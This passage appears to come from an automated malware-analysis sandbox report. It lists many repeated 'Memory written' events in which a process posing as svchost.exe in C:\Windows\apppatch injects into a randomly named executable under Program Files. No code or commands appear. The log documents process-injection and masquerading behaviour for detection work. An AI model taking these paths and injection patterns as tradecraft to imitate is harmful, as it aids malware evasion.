    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2655000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2920000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2921000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2922000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2975000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E90000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E91000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E92000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EE5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2270000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2271000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2272000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 22C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1470000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1471000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1472000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2270000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2271000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2272000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 22C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2700000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2701000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2702000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2755000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2ED5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2535000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2880000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2881000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2882000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2925000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2F45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1570000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1571000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1572000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 15C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2310000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2311000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2312000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2365000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B60000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B61000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B62000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2BB5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2380000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2381000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2382000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 23D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3015000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AB5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2790000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2791000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2792000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3120000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3121000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3122000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3175000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B40000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B41000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B42000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B95000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2680000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2681000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2682000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 26D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2300000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2301000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2302000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2355000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1505000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 620000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 621000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 622000Jump to behavior
